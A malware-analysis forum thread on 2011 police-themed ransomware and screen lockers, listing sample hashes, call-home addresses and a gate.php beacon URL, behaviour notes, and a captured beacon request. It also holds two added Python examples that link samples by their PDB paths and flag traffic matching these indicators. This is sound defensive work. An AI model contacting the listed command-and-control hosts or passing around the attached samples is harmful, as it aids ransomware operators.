Trojan Ransom / FakePoliceAlert

Forum for analysis and discussion about malware.
markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan Winlock / Ransom / ScreenLocker

Post by markusg » Mon Jun 20, 2011 8:56 am


Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Trojan Winlock / Ransom / ScreenLocker

Post by Xylitol » Mon Jun 20, 2011 10:30 am

Hello, unpacked sample in attach.


20/41 >> 48.8%
http://www.virustotal.com/file-scan/rep ... 1308565159

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Trojan Ransom / FakePoliceAlert

Post by markusg » Wed Oct 05, 2011 5:32 pm


EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Malware/Not classified

Post by EP_X0FF » Wed Oct 05, 2011 5:46 pm

Trojan ransom

posts moved.
Ring0 - the source of inspiration

markusg
Posts: 733
Joined: Mon Mar 15, 2010 2:53 pm

Re: Trojan Winlock / Ransom / ScreenLocker

Post by markusg » Thu Oct 20, 2011 2:15 pm

explorer.exe
MD5   : 412cc709170aff1a15e895e16c397244
http://www.virustotal.com/file-scan/rep ... 1319118846

EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Trojan Winlock / Ransom / ScreenLocker

Post by EP_X0FF » Thu Oct 20, 2011 2:53 pm

markusg wrote:explorer.exe
MD5   : 412cc709170aff1a15e895e16c397244
http://www.virustotal.com/file-scan/report.html?id=73f1f147380c03dad7fccfb5639e9d784d53f6a971821a772908d7aeb7f600f0-1319118846
Calls home hxxp://91.228.160.157/de/2/gate.php?cmd=ul&id=gpo5fv71j6hfh3x2

Replaces explorer.exe with malware copy.

Terminates taskmanager and process explorer.

In attach decrypted.
W:\locker\locker\Release\locker.pdb
Ring0 - the source of inspiration

Maxstar
Posts: 88
Joined: Wed Jan 26, 2011 10:20 am

Re: Trojan Winlock / Ransom / ScreenLocker

Post by Maxstar » Fri Nov 18, 2011 2:09 pm


EP_X0FF
Global Moderator
Posts: 4806
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation

Re: Trojan Winlock / Ransom / ScreenLocker

Post by EP_X0FF » Fri Nov 18, 2011 2:29 pm

Interesting. Internally this sample looks identical to those posted by markusg earlier.
y:\src\_cpp\bwin_nl\Release\bwin3.pdb
Take a look at the debug path string, bwin_nl.

Also the same call home address hxxp://89.248.165.131

The only difference is in resources part. Different HTML and images.

Fully decrypted workable sample in attach.
Ring0 - the source of inspiration
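The two posts above relate samples by their linker debug strings (W:\locker\locker\Release\locker.pdb in the 20 Oct sample, y:\src\_cpp\bwin_nl\Release\bwin3.pdb here). As an added example, not code from the thread or from any of its posters, the Python below pulls CodeView RSDS records (GUID, age, PDB path) out of an unpacked image by a plain byte scan, derives the project directory from the path, and compares two samples on path, project and build. The byte blobs are constructed stand-ins for the unpacked files; only the PDB paths come from the thread, the GUIDs and ages are invented.

```python
import re
import struct

# CodeView 7.0 debug record as the MSVC linker writes it:
#   b"RSDS" | 16-byte GUID | uint32 LE age | NUL-terminated PDB path
# A linear byte scan is used instead of walking the PE debug directory so the
# same routine works on memory dumps and unpacked layers with damaged headers.
# GUID+age identify one specific build; the path identifies the project.
RSDS_RE = re.compile(rb"RSDS(.{16})(.{4})([^\x00]{1,512})\x00", re.DOTALL)


def extract_pdb_records(data: bytes) -> list:
    """Return every RSDS record in `data` as a dict (offset, guid, age, path)."""
    records = []
    for m in RSDS_RE.finditer(data):
        guid_raw, age_raw, path = m.groups()
        d1, d2, d3 = struct.unpack("<IHH", guid_raw[:8])  # mixed-endian GUID fields
        tail = guid_raw[8:].hex()
        records.append({
            "offset": m.start(),
            "guid": f"{d1:08x}-{d2:04x}-{d3:04x}-{tail[:4]}-{tail[4:]}",
            "age": struct.unpack("<I", age_raw)[0],
            "path": path.decode("latin-1"),
        })
    return records


def project_dir(pdb_path: str) -> str:
    """Directory the PDB lives in, with the MSVC Release/Debug directory stripped."""
    parts = [p for p in re.split(r"[\\/]", pdb_path) if p]
    dirs = parts[:-1]
    while dirs and dirs[-1].lower() in ("release", "debug"):
        dirs.pop()
    return dirs[-1] if dirs else ""


def _constructed_image(pdb_path: bytes, guid: bytes, age: int) -> bytes:
    """Constructed stand-in for an unpacked PE: filler bytes around one RSDS record."""
    record = b"RSDS" + guid + struct.pack("<I", age) + pdb_path + b"\x00"
    return b"MZ" + b"\x90" * 64 + record + b"\xcc" * 16


# Only the PDB paths are from the thread; the GUIDs and ages are invented.
SAMPLE_OCT20 = _constructed_image(rb"W:\locker\locker\Release\locker.pdb", bytes(range(16)), 1)
SAMPLE_NOV18 = _constructed_image(rb"y:\src\_cpp\bwin_nl\Release\bwin3.pdb", bytes(range(16, 32)), 3)


def compare_builds(a: bytes, b: bytes) -> dict:
    """Relate two samples on their first RSDS record: same path, same project, same build."""
    recs_a, recs_b = extract_pdb_records(a), extract_pdb_records(b)
    if not recs_a or not recs_b:
        return {"same_build": False, "same_project": False, "same_path": False}
    ra, rb_ = recs_a[0], recs_b[0]
    return {
        "same_build": (ra["guid"], ra["age"]) == (rb_["guid"], rb_["age"]),
        "same_project": project_dir(ra["path"]) == project_dir(rb_["path"]),
        "same_path": ra["path"] == rb_["path"],
    }


if __name__ == "__main__":
    for name, blob in (("20 Oct sample", SAMPLE_OCT20), ("18 Nov sample", SAMPLE_NOV18)):
        for rec in extract_pdb_records(blob):
            print(f"{name}: {rec['path']}  project={project_dir(rec['path'])}  "
                  f"guid={rec['guid']} age={rec['age']}")
    print(compare_builds(SAMPLE_OCT20, SAMPLE_NOV18))
```

Run it on the decrypted layer rather than the packed file: the RSDS record lives in the inner binary, which is why the thread only quotes these paths after unpacking. A matching GUID and age means the same linker output, while a matching project directory with a different GUID is the "same source, rebuilt with different resources" case the 18 Nov post describes.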

S!Ri
Posts: 5
Joined: Fri Sep 02, 2011 7:36 am

Re: Trojan Ransom / FakePoliceAlert

Post by S!Ri » Mon Nov 21, 2011 8:37 am

Didn't see this Spanish version (or I missed it):


Xylitol
Global Moderator
Posts: 1666
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Trojan Ransom / FakePoliceAlert

Post by Xylitol » Tue Nov 22, 2011 6:06 pm


Switzerland version
It does a GET request and later calls tools.ip2location.com, as usual.


GET /i.php?a=2 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible;)
Host: 89.248.165.131
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Tue, 22 Nov 2011 17:22:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
The following URLs were found on the server:


http://89.248.165.131:80/cgi-bin/
http://89.248.165.131:80/icons/
http://89.248.165.131:80/webmail/
http://89.248.165.131:80/error/
http://89.248.165.131:80/manager/
http://89.248.165.131:80/disabled/
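The capture above, together with the gate.php URL quoted earlier in the thread, gives enough to write a network-side check for this family. As an added example that is not part of Xylitol's post or anyone else's in the thread, the Python below parses raw HTTP request heads and flags the indicators the thread records: the two call-home addresses, the bare "Mozilla/4.0 (compatible;)" User-Agent, a gate.php request with cmd=ul, and a lookup of tools.ip2location.com. The first sample request is the capture above verbatim; the gate.php request is rebuilt from the URL EP_X0FF quoted (no capture of it is on the page, so its headers are assumed); the ip2location request path and the benign request are constructed.

```python
import re
from dataclasses import dataclass

# Indicators taken from the thread: call-home hosts, the gate.php "cmd=ul"
# beacon, the bare MSIE-style User-Agent and the ip2location lookup.
C2_HOSTS = {"91.228.160.157", "89.248.165.131"}
BARE_UA = "Mozilla/4.0 (compatible;)"
GATE_RE = re.compile(r"/gate\.php\?(?:[^ ]*&)?cmd=ul(?:&|$)")
GEOIP_HOST = "tools.ip2location.com"


@dataclass
class Request:
    method: str
    target: str
    headers: dict  # header names lower-cased, values stripped


def parse_request(raw: str) -> Request:
    """Parse the head of a raw HTTP/1.x request (request line plus headers)."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = [ln for ln in head.splitlines() if ln.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, target, headers)


def classify(req: Request) -> list:
    """Return the indicator names one request matches, in a fixed order."""
    hits = []
    host = req.headers.get("host", "").split(":")[0].lower()  # drop any :port
    if host in C2_HOSTS:
        hits.append("known-c2-host")
    if req.headers.get("user-agent") == BARE_UA:
        hits.append("bare-msie-ua")
    if GATE_RE.search(req.target):
        hits.append("gate-upload-beacon")
    if host == GEOIP_HOST:
        hits.append("geoip-lookup")
    return hits


def scan(raw_requests) -> list:
    """(target, hits) for every request; clean requests are kept with an empty list."""
    return [(r.target, classify(r)) for r in map(parse_request, raw_requests)]


# Verbatim from the capture in the post above.
CAPTURED_BEACON = (
    "GET /i.php?a=2 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible;)\r\n"
    "Host: 89.248.165.131\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
# Rebuilt from the gate.php URL quoted earlier in the thread; headers assumed.
GATE_BEACON = (
    "GET /de/2/gate.php?cmd=ul&id=gpo5fv71j6hfh3x2 HTTP/1.1\r\n"
    "Host: 91.228.160.157\r\n\r\n"
)
# Constructed: the thread names the host but not the request path.
GEOIP_LOOKUP = "GET / HTTP/1.1\r\nHost: tools.ip2location.com\r\n\r\n"
# Constructed benign traffic for contrast.
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0\r\n\r\n"
)
SAMPLE_TRAFFIC = [CAPTURED_BEACON, GATE_BEACON, GEOIP_LOOKUP, BENIGN]


if __name__ == "__main__":
    for target, hits in scan(SAMPLE_TRAFFIC):
        print(f"{target:50} {', '.join(hits) or '-'}")
```

The host and gate.php matches are the strong signals; the bare User-Agent and the ip2location lookup are weak on their own (other software sends both) and are worth alerting on only when they occur alongside one of the strong ones or, as in Xylitol's observation, in sequence from the same machine.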
